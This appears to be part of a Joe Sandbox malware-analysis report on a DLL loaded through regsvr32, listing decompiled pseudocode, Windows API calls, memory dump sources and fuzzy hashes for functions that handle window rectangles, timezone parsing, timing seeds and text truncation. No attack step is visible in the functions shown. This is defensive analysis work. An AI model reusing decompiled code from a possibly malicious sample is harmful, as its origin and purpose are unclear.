                                                                              0x1002d047
                                                                              0x1002d04b
                                                                              0x1002d04f
                                                                              0x1002d05b
                                                                              0x1002d05f
                                                                              0x1002d067
                                                                              0x1002d06d
                                                                              0x1002d071
                                                                              0x1002d076
                                                                              0x1002d07b
                                                                              0x1002d07f
                                                                              0x1002d084
                                                                              0x1002d088
                                                                              0x1002d08c
                                                                              0x1002d090
                                                                              0x1002d096
                                                                              0x1002d09b
                                                                              0x1002d09f
                                                                              0x1002d0a4
                                                                              0x1002d0a8
                                                                              0x1002d0ae
                                                                              0x1002d0b4
                                                                              0x1002d0b8
                                                                              0x1002d2d3
                                                                              0x1002d2d3
                                                                              0x1002d2de
                                                                              0x1002d2e3
                                                                              0x1002d2ee
                                                                              0x1002d2f3
                                                                              0x1002d300
                                                                              0x1002d308
                                                                              0x1002d30e
                                                                              0x1002d315
                                                                              0x1002d31b
                                                                              0x1002d31e
                                                                              0x1002d323
                                                                              0x1002d32f
                                                                              0x1002d33a
                                                                              0x1002d345
                                                                              0x1002d350
                                                                              0x1002d358
                                                                              0x1002d35d
                                                                              0x1002d363
                                                                              0x1002d369
                                                                              0x1002d36e
                                                                              0x1002d371
                                                                              0x1002d37c
                                                                              0x1002cdf0
                                                                              0x1002cdf6
                                                                              0x1002cdf9
                                                                              0x1002ce02
                                                                              0x1002cf25
                                                                              0x1002cf25
                                                                              0x1002cf25
                                                                              0x00000000
                                                                              0x1002ce08
                                                                              0x1002ce10
                                                                              0x1002ce19
                                                                              0x1002ce1e
                                                                              0x1002ce1e
                                                                              0x1002ce27
                                                                              0x1002ce30
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002ce3b
                                                                              0x1002ce3e
                                                                              0x1002ce41
                                                                              0x1002ce4b
                                                                              0x1002cf14
                                                                              0x1002cf18
                                                                              0x00000000
                                                                              0x1002cf18
                                                                              0x1002ce55
                                                                              0x1002ce5a
                                                                              0x1002cecd
                                                                              0x1002ced4
                                                                              0x1002ced6
                                                                              0x1002ceda
                                                                              0x1002cee3
                                                                              0x1002cee3
                                                                              0x1002cee8
                                                                              0x1002ceee
                                                                              0x00000000
                                                                              0x1002cef0
                                                                              0x00000000
                                                                              0x1002cef0
                                                                              0x1002ceee
                                                                              0x1002ce5c
                                                                              0x1002ce5f
                                                                              0x1002ceac
                                                                              0x1002ceb3
                                                                              0x1002ceb9
                                                                              0x1002cebd
                                                                              0x1002cec3
                                                                              0x1002cec3
                                                                              0x00000000
                                                                              0x1002ceb3
                                                                              0x1002ce61
                                                                              0x1002ce66
                                                                              0x1002ce87
                                                                              0x1002ce8e
                                                                              0x1002ce93
                                                                              0x1002ce96
                                                                              0x1002cea2
                                                                              0x1002ce98
                                                                              0x1002ce98
                                                                              0x1002ce98
                                                                              0x00000000
                                                                              0x1002ce96
                                                                              0x1002ce68
                                                                              0x1002ce6b
                                                                              0x1002cef5
                                                                              0x1002cefc
                                                                              0x1002ceff
                                                                              0x1002cf08
                                                                              0x1002cf01
                                                                              0x1002cf01
                                                                              0x1002cf01
                                                                              0x1002cf0d
                                                                              0x1002cf27
                                                                              0x1002cf2c
                                                                              0x1002cf2c
                                                                              0x1002ce74
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002ce7f
                                                                              0x1002ce7f
                                                                              0x1002cf20
                                                                              0x00000000
                                                                              0x1002cf20
                                                                              0x1002ce02

                                                                              APIs
                                                                                • Part of subcall function 1002C6A8: PeekMessageW.USER32 ref: 1002C6F4
                                                                                • Part of subcall function 1002C6A8: SetRectEmpty.USER32 ref: 1002C723
                                                                                • Part of subcall function 1002C6A8: GetDesktopWindow.USER32 ref: 1002C752
                                                                                • Part of subcall function 1002C6A8: LockWindowUpdate.USER32 ref: 1002C767
                                                                                • Part of subcall function 1002C6A8: GetDCEx.USER32 ref: 1002C781
                                                                                • Part of subcall function 1000C248: GetModuleHandleA.KERNEL32 ref: 1000C258
                                                                                • Part of subcall function 1000C248: GetProcAddress.KERNEL32 ref: 1000C268
                                                                              • GetWindowRect.USER32 ref: 1002CF8F
                                                                              • GetWindowRect.USER32 ref: 1002D0D0
                                                                              • GetWindowRect.USER32 ref: 1002D19B
                                                                              • InflateRect.USER32 ref: 1002D308
                                                                              • InflateRect.USER32 ref: 1002D323
                                                                                • Part of subcall function 1000C298: GetModuleHandleA.KERNEL32 ref: 1000C2AC
                                                                                • Part of subcall function 1000C298: GetProcAddress.KERNEL32 ref: 1000C2BE
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Window$AddressHandleInflateModuleProc$DesktopEmptyLockMessagePeekUpdate
                                                                              • String ID:
                                                                              • API String ID: 4267001942-0
                                                                              • Opcode ID: d2f68153960f436d79cdb0af47631491f76d6caf84bcd4f6a3e56d672d1837e7
                                                                              • Instruction ID: 64a9869c4160c8855390b14967ec39411355a38499b5570be5a5c252545a0583
                                                                              • Opcode Fuzzy Hash: d2f68153960f436d79cdb0af47631491f76d6caf84bcd4f6a3e56d672d1837e7
                                                                              • Instruction Fuzzy Hash: 2BC10A77618A858AD770CF2AE44069EB7A0F789B88F449215EBCE57B18DF3CD645CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001BEC8 Relevance: 7.6, APIs: 5, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Long
                                                                              • String ID:
                                                                              • API String ID: 3430364388-0
                                                                              • Opcode ID: b445473c86e623bcf181fcea0412305b972362139849348fb71265764dba8dab
                                                                              • Instruction ID: 0c321890e46772c5e3142d0292bb07ad6876a5d360ff276de159e1d9ef4c7460
                                                                              • Opcode Fuzzy Hash: b445473c86e623bcf181fcea0412305b972362139849348fb71265764dba8dab
                                                                              • Instruction Fuzzy Hash: 5C219D26700A4086F759DB76AC60B6A3A50FBCCBD9F115139EE0A4BB55EF79C4C2CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1003E420 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 1003E466
                                                                              • GetCurrentProcessId.KERNEL32 ref: 1003E471
                                                                              • GetCurrentThreadId.KERNEL32 ref: 1003E47D
                                                                              • GetTickCount.KERNEL32 ref: 1003E489
                                                                              • QueryPerformanceCounter.KERNEL32 ref: 1003E49A
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                              • String ID:
                                                                              • API String ID: 1445889803-0
                                                                              • Opcode ID: d7df148b42bf0ed6aa5600e019d443b8ddd03ef486a9e760902f56fc3d41fe11
                                                                              • Instruction ID: d878599145e5abb6cbccd55749b941ac3e8e3ecc94ddde81aa6e1bcb9752648c
                                                                              • Opcode Fuzzy Hash: d7df148b42bf0ed6aa5600e019d443b8ddd03ef486a9e760902f56fc3d41fe11
                                                                              • Instruction Fuzzy Hash: D3111535255B4086E7818F26E840386B365F74AB95F852215EE8E43BA4DF7DC8D88B00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10044E00 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 71%
                                                                              			E10044E00(void* __ebx, void* __edx, void* __esp, void* __eflags, signed char __rbx, signed long long __rdx, signed char* __rdi, signed char __rsi, void* __rbp, void* __r8, void* __r9, signed char __r12, long long __r13, signed char* __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _v8;
				void* _v16;
				signed char* _v40;
				char _v44;
				signed int _v48;
				signed char _v52;
				signed int _v56;
				long long _v64;
				signed char* _v72;
				intOrPtr _v80;
				signed char* _v88;
				void* _t69;
				void* _t76;
				void* _t77;
				void* _t78;
				signed int _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				void* _t102;
				signed int _t107;
				signed int _t108;
				signed int _t116;
				signed int _t123;
				void* _t128;
				void* _t137;
				signed char* _t172;
				signed char* _t180;
				signed char* _t182;
				signed char* _t187;
				signed char* _t205;
				signed char* _t208;
				signed char* _t214;
				void* _t216;
				signed char* _t217;
				signed char _t218;
				long long _t220;
				signed char* _t222;

				_t222 = __r14;
				_t220 = __r13;
				_t218 = __r12;
				_t216 = __r9;
				_t209 = __r8;
				_t207 = __rbp;
				_t201 = __rdi;
				_t200 = __rdx;
				_t179 = __rbx;
				_t137 = __esp;
				_t102 = __ebx;
				_t172 = _t208;
				_t172[8] = __rbx;
				_t172[0x10] = __rsi;
				_t172[0x18] = __rdi;
				_t172[0x20] = __r12;
				 *((long long*)(_t172 - 8)) = __r13;
				 *((long long*)(_t172 - 0x10)) = __r14;
				r14d = 0;
				r13d = r14d;
				r12d = r14d;
				 *(_t172 - 0x38) = r14d;
				 *(_t172 - 0x34) = r14d;
				 *(_t172 - 0x30) = r14d;
				_t10 =  &(_t222[7]); // 0x7
				_t103 = _t10;
				E10042AD0();
				E10044DF0(_t69);
				_t205 = _t172;
				if(E10044D70(_t172, __rbx,  &_v56, __rdx, __rdi, _t205, __rbp, __r8) != 0) {
					_v88 = __r14;
					r9d = 0;
					r8d = 0;
					_t103 = 0;
					E1003C6F0(0, __rdx, __r8);
				}
				if(E10044CD0(_t102, _t137, _t172,  &_v52, _t205) != 0) {
					_v88 = _t222;
					r9d = 0;
					r8d = 0;
					_t103 = 0;
					E1003C6F0(0, _t200, _t209);
				}
				_t185 =  &_v48;
				if(E10044D20(_t172, _t179,  &_v48, _t200, _t201, _t205, _t207, _t209) != 0) {
					_v88 = _t222;
					r9d = 0;
					r8d = 0;
					_t103 = 0;
					E1003C6F0(0, _t200, _t209);
				}
				E1004B060(_t172, _t179, _t185, _t201, _t205);
				 *0x10075adc = r14d;
				 *0x1006fca0 = 0xffffffff;
				 *0x1006fc90 = 0xffffffff;
				_t75 = E1004AF70(_t179, "TZ", _t201, _t205, _t207);
				_t180 = _t172;
				_v40 = _t172;
				if(_t172 == 0 ||  *_t172 == 0) {
					_t187 =  *0x10075ae0; // 0x0
					if(_t187 != 0) {
						E10039620(_t172, _t187);
						 *0x10075ae0 = _t222;
					}
					if(GetTimeZoneInformation() == 0xffffffff) {
						L38:
						r12d = 1;
						goto L39;
					} else {
						 *0x10075adc = 1;
						_t107 =  *0x10075a30; // 0x0
						_t108 = _t107 * 0x3c;
						_v56 = _t108;
						if( *0x10075a76 == 0) {
							_t123 =  *0x10075a84; // 0x0
						} else {
							_t123 =  *0x10075a84; // 0x0
							_v56 = _t108 + _t123 * 0x3c;
						}
						if( *0x10075aca == 0) {
							L29:
							_v52 = r14d;
							_v48 = r14d;
							goto L30;
						} else {
							_t90 =  *0x10075ad8; // 0x0
							if(_t90 == 0) {
								goto L29;
							}
							_v52 = 1;
							_v48 = (_t90 - _t123) * 0x3c;
							L30:
							_v64 =  &_v44;
							_v72 = _t222;
							_v80 = 0x3f;
							_v88 =  *_t205;
							r9d = 0xffffffff;
							if(WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0 || _v44 != 0) {
								 *( *_t205) = 0;
							} else {
								 *((char*)( *_t205 + 0x3f)) = 0;
							}
							_v64 =  &_v44;
							_v72 = _t222;
							_v80 = 0x3f;
							_v88 = _t205[8];
							r9d = 0xffffffff;
							if(WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0 || _v44 != 0) {
								_t172 = _t205[8];
								 *_t172 = 0;
							} else {
								_t172 = _t205[8];
								_t172[0x3f] = 0;
							}
							goto L38;
						}
					}
				} else {
					_t214 =  *0x10075ae0; // 0x0
					if(_t214 == 0) {
						L14:
						if(_t214 != 0) {
							E10039620(_t172, _t214);
						}
						_t201 = _t180;
						asm("repne scasb");
						_t75 = E1003D3A0(_t103, _t172, _t180,  !0xffffffff, _t180, _t205, _t207);
						_t217 = _t172;
						 *0x10075ae0 = _t172;
						if(_t172 != 0) {
							_t201 = _t180;
							asm("repne scasb");
							_t215 = _t180;
							_t200 =  !0xffffffff;
							if(E10047020(_t172, _t180, _t217,  !0xffffffff, _t180, _t205, _t207, _t180) != 0) {
								_v88 = _t222;
								r9d = 0;
								r8d = 0;
								_t75 = E1003C6F0(0,  !0xffffffff, _t215);
							}
						} else {
							_t20 =  &(_t172[1]); // 0x1
							r12d = _t20;
						}
						L39:
						_t76 = E10044DE0(_t75);
						 *_t172 = _v56;
						_t77 = E10044DC0(_t76);
						 *_t172 = _v52;
						_t78 = E10044DD0(_t77);
						 *_t172 = _v48;
						E100429A0();
						if(r12d != 0) {
							L64:
							return _t78;
						}
						_t48 = _t218 + 3; // 0x3
						r9d = _t48;
						_t210 = _t180;
						if(E10048520(_t172, _t180,  *_t205, _t200, _t201, _t205, _t207, _t180, _t216) != 0) {
							_v88 = _t222;
							r9d = 0;
							r8d = 0;
							E1003C6F0(0, _t200, _t210);
						}
						_t182 =  &(_t180[3]);
						if( *_t182 == 0x2d) {
							r13d = 1;
							_t182 =  &(_t182[_t220]);
						}
						_t116 = E10038FB0(_t182, _t200) * 0xe10;
						_v56 = _t116;
						while(1) {
							_t81 =  *_t182 & 0x000000ff;
							if(_t81 != 0x2b && (_t81 < 0x30 || _t81 > 0x39)) {
								break;
							}
							_t182 =  &(_t182[1]);
						}
						if( *_t182 != 0x3a) {
							L56:
							if(r13d != 0) {
								_v56 =  ~_t116;
							}
							_t82 =  *_t182;
							_v52 = _t82;
							if(_t82 == 0) {
								_t172 = _t205[8];
								 *_t172 = 0;
							} else {
								r9d = 3;
								_t211 = _t182;
								if(E10048520(_t172, _t182, _t205[8], _t200, _t201, _t205, _t207, _t182, _t216) != 0) {
									_v88 = _t222;
									r9d = 0;
									r8d = 0;
									_t82 = E1003C6F0(0, _t200, _t211);
								}
							}
							_t78 = E10044DE0(_t82);
							 *_t172 = _v56;
							goto L64;
						}
						_t182 =  &(_t182[1]);
						_t116 = _v56 + E10038FB0(_t182, _t200) * 0x3c;
						_v56 = _t116;
						_t85 =  *_t182 & 0x000000ff;
						if(_t85 < 0x30) {
							L52:
							if( *_t182 != 0x3a) {
								goto L56;
							}
							_t182 =  &(_t182[1]);
							_t116 = _v56 + E10038FB0(_t182, _t200);
							_v56 = _t116;
							_t87 =  *_t182 & 0x000000ff;
							if(_t87 < 0x30) {
								goto L56;
							}
							while(_t87 <= 0x39) {
								_t182 =  &(_t182[1]);
								_t87 =  *_t182;
								if(_t87 >= 0x30) {
									continue;
								}
								goto L56;
							}
							goto L56;
						}
						while(_t85 <= 0x39) {
							_t182 =  &(_t182[1]);
							_t85 =  *_t182;
							if(_t85 >= 0x30) {
								continue;
							}
							goto L52;
						}
						goto L52;
					}
					_t201 = _t214 - _t172;
					while(1) {
						_t103 = _t172[_t201] & 0x000000ff;
						_t128 = ( *_t172 & 0x000000ff) - _t103;
						if(_t128 != 0) {
							break;
						}
						_t172 =  &(_t172[1]);
						if(_t103 != 0) {
							continue;
						}
						break;
					}
					if(_t128 != 0) {
						goto L14;
					}
					r12d = _t200 + 1;
					goto L39;
				}
			}









































                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e00
                                                                              0x10044e07
                                                                              0x10044e0b
                                                                              0x10044e0f
                                                                              0x10044e13
                                                                              0x10044e17
                                                                              0x10044e1b
                                                                              0x10044e1f
                                                                              0x10044e22
                                                                              0x10044e25
                                                                              0x10044e28
                                                                              0x10044e2c
                                                                              0x10044e30
                                                                              0x10044e34
                                                                              0x10044e34
                                                                              0x10044e38
                                                                              0x10044e3e
                                                                              0x10044e43
                                                                              0x10044e52
                                                                              0x10044e54
                                                                              0x10044e59
                                                                              0x10044e5c
                                                                              0x10044e61
                                                                              0x10044e63
                                                                              0x10044e63
                                                                              0x10044e74
                                                                              0x10044e76
                                                                              0x10044e7b
                                                                              0x10044e7e
                                                                              0x10044e83
                                                                              0x10044e85
                                                                              0x10044e85
                                                                              0x10044e8a
                                                                              0x10044e96
                                                                              0x10044e98
                                                                              0x10044e9d
                                                                              0x10044ea0
                                                                              0x10044ea5
                                                                              0x10044ea7
                                                                              0x10044ea7
                                                                              0x10044eac
                                                                              0x10044eb3
                                                                              0x10044eba
                                                                              0x10044ec4
                                                                              0x10044ed5
                                                                              0x10044eda
                                                                              0x10044edd
                                                                              0x10044ee5
                                                                              0x10044fab
                                                                              0x10044fb5
                                                                              0x10044fb7
                                                                              0x10044fbc
                                                                              0x10044fbc
                                                                              0x10044fd3
                                                                              0x100450e7
                                                                              0x100450e7
                                                                              0x00000000
                                                                              0x10044fd9
                                                                              0x10044fd9
                                                                              0x10044fe3
                                                                              0x10044fe9
                                                                              0x10044fec
                                                                              0x10044ff8
                                                                              0x1004500d
                                                                              0x10044ffa
                                                                              0x10044ffa
                                                                              0x10045007
                                                                              0x10045007
                                                                              0x1004501b
                                                                              0x1004503a
                                                                              0x1004503a
                                                                              0x1004503f
                                                                              0x00000000
                                                                              0x1004501d
                                                                              0x1004501d
                                                                              0x10045025
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045027
                                                                              0x10045034
                                                                              0x10045044
                                                                              0x10045049
                                                                              0x1004504e
                                                                              0x10045053
                                                                              0x1004505e
                                                                              0x10045063
                                                                              0x1004507c
                                                                              0x10045091
                                                                              0x10045085
                                                                              0x10045088
                                                                              0x10045088
                                                                              0x10045099
                                                                              0x1004509e
                                                                              0x100450a3
                                                                              0x100450af
                                                                              0x100450b4
                                                                              0x100450cd
                                                                              0x100450e0
                                                                              0x100450e4
                                                                              0x100450d6
                                                                              0x100450d6
                                                                              0x100450da
                                                                              0x100450da
                                                                              0x00000000
                                                                              0x100450cd
                                                                              0x1004501b
                                                                              0x10044ef4
                                                                              0x10044ef4
                                                                              0x10044efe
                                                                              0x10044f30
                                                                              0x10044f33
                                                                              0x10044f38
                                                                              0x10044f38
                                                                              0x10044f46
                                                                              0x10044f49
                                                                              0x10044f4e
                                                                              0x10044f53
                                                                              0x10044f56
                                                                              0x10044f60
                                                                              0x10044f74
                                                                              0x10044f77
                                                                              0x10044f7c
                                                                              0x10044f7f
                                                                              0x10044f8c
                                                                              0x10044f92
                                                                              0x10044f97
                                                                              0x10044f9a
                                                                              0x10044fa1
                                                                              0x10044fa1
                                                                              0x10044f62
                                                                              0x10044f62
                                                                              0x10044f62
                                                                              0x10044f62
                                                                              0x100450ed
                                                                              0x100450f1
                                                                              0x100450f6
                                                                              0x100450fc
                                                                              0x10045101
                                                                              0x10045107
                                                                              0x1004510c
                                                                              0x10045113
                                                                              0x1004511b
                                                                              0x10045251
                                                                              0x1004527f
                                                                              0x1004527f
                                                                              0x10045121
                                                                              0x10045121
                                                                              0x10045126
                                                                              0x10045138
                                                                              0x1004513a
                                                                              0x1004513f
                                                                              0x10045142
                                                                              0x10045149
                                                                              0x10045149
                                                                              0x1004514e
                                                                              0x10045155
                                                                              0x10045157
                                                                              0x1004515d
                                                                              0x1004515d
                                                                              0x1004516a
                                                                              0x10045170
                                                                              0x10045174
                                                                              0x10045174
                                                                              0x10045179
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10045248
                                                                              0x10045248
                                                                              0x1004518e
                                                                              0x100451ee
                                                                              0x100451f1
                                                                              0x100451f5
                                                                              0x100451f5
                                                                              0x100451f9
                                                                              0x100451fc
                                                                              0x10045202
                                                                              0x10045234
                                                                              0x10045238
                                                                              0x10045204
                                                                              0x10045204
                                                                              0x1004520a
                                                                              0x1004521c
                                                                              0x1004521e
                                                                              0x10045223
                                                                              0x10045226
                                                                              0x1004522d
                                                                              0x1004522d
                                                                              0x1004521c
                                                                              0x1004523f
                                                                              0x10045244
                                                                              0x00000000
                                                                              0x10045244
                                                                              0x10045190
                                                                              0x100451a3
                                                                              0x100451a5
                                                                              0x100451a9
                                                                              0x100451ae
                                                                              0x100451be
                                                                              0x100451c1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100451c3
                                                                              0x100451d3
                                                                              0x100451d5
                                                                              0x100451d9
                                                                              0x100451de
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100451e0
                                                                              0x100451e4
                                                                              0x100451e8
                                                                              0x100451ec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100451ec
                                                                              0x00000000
                                                                              0x100451e0
                                                                              0x100451b0
                                                                              0x100451b4
                                                                              0x100451b8
                                                                              0x100451bc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100451bc
                                                                              0x00000000
                                                                              0x100451b0
                                                                              0x10044f03
                                                                              0x10044f10
                                                                              0x10044f13
                                                                              0x10044f17
                                                                              0x10044f19
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044f1b
                                                                              0x10044f21
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044f21
                                                                              0x10044f25
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10044f27
                                                                              0x00000000
                                                                              0x10044f27

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerFreeHeapPresentTerminate
                                                                              • String ID: ?
                                                                              • API String ID: 3723150710-1684325040
                                                                              • Opcode ID: 3943088a9eb6fac38a185bbc274c6b4d815c5295ae12b756a0b12085acd838a2
                                                                              • Instruction ID: 3a57faf50443dbe7019a7ba4186a06a5f1ca000c56497dfc792e3f43c686570e
                                                                              • Opcode Fuzzy Hash: 3943088a9eb6fac38a185bbc274c6b4d815c5295ae12b756a0b12085acd838a2
                                                                              • Instruction Fuzzy Hash: B6C12336604A808AD721CF25E84135A77A1F785785F618235DFC9C7BAADF7ED842CB04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10001B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 28%
                                                                              			E10001B20(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* __r11, long long __r12, long long __r13, long long _a8, long long _a16, long long _a24, long long _a32) {
				long long _v8;
				long long _v16;
				intOrPtr _v40;
				int _t25;
				signed long long _t30;
				signed long long _t31;
				void* _t39;
				signed long long _t48;
				void* _t52;
				short* _t55;
				long long _t56;
				void* _t67;

				_t67 = __r11;
				_t56 = __rsi;
				_a8 = __rbx;
				_a16 = __rbp;
				_t30 = r9d;
				_a32 = __rdi;
				_v8 = __r12;
				r12d = __edx;
				r8d = _t30;
				_t25 = GetTextExtentPoint32W(??, ??, ??, ??);
				r10d = _v40;
				r10d = r10d + r8d;
				if(r10d > r12d) {
					_v16 = __r13;
					E10038D40(_t39, 0x10075e50, 0x10076060, 0x10076060, 0xffffffff);
					_t52 = 0x1005f630;
					r8d = 8;
					GetTextExtentPoint32W(??, ??, ??, ??);
					_t31 = _t30 + 0xffffffff;
					_t48 = _t31;
					if(_t31 > 0) {
						_a24 = __rsi;
						_t55 = 0x10075e50 + _t48 * 2;
						while(1) {
							 *_t55 = 0;
							r8d = _t31;
							_t52 = 0x10075e50;
							GetTextExtentPoint32W(??, ??, ??, ??);
							r11d = _v40;
							if(_t56 + _t67 <= r12d) {
								break;
							}
							_t31 = _t31 - 1;
							_t55 = _t55 - 2;
							if(_t31 > 0) {
								continue;
							}
							break;
						}
					}
					_t25 = E10038E60(_t39, 0x10075e50, _t52, 0x1005f630);
				} else {
				}
				return _t25;
			}















                                                                              0x10001b20
                                                                              0x10001b20
                                                                              0x10001b24
                                                                              0x10001b29
                                                                              0x10001b2e
                                                                              0x10001b31
                                                                              0x10001b40
                                                                              0x10001b45
                                                                              0x10001b54
                                                                              0x10001b57
                                                                              0x10001b5d
                                                                              0x10001b62
                                                                              0x10001b68
                                                                              0x10001b76
                                                                              0x10001b98
                                                                              0x10001ba6
                                                                              0x10001bad
                                                                              0x10001bb3
                                                                              0x10001bb9
                                                                              0x10001bbe
                                                                              0x10001bc1
                                                                              0x10001bc3
                                                                              0x10001bce
                                                                              0x10001be0
                                                                              0x10001be0
                                                                              0x10001bee
                                                                              0x10001bf1
                                                                              0x10001bf4
                                                                              0x10001bfa
                                                                              0x10001c06
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10001c08
                                                                              0x10001c0b
                                                                              0x10001c11
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10001c11
                                                                              0x10001c13
                                                                              0x10001c27
                                                                              0x10001b6a
                                                                              0x10001b6a
                                                                              0x10001c4c

                                                                              APIs
                                                                              • GetTextExtentPoint32W.GDI32 ref: 10001B57
                                                                              • GetTextExtentPoint32W.GDI32 ref: 10001BB3
                                                                              • GetTextExtentPoint32W.GDI32 ref: 10001BF4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExtentPoint32Text
                                                                              • String ID: ...
                                                                              • API String ID: 223599850-440645147
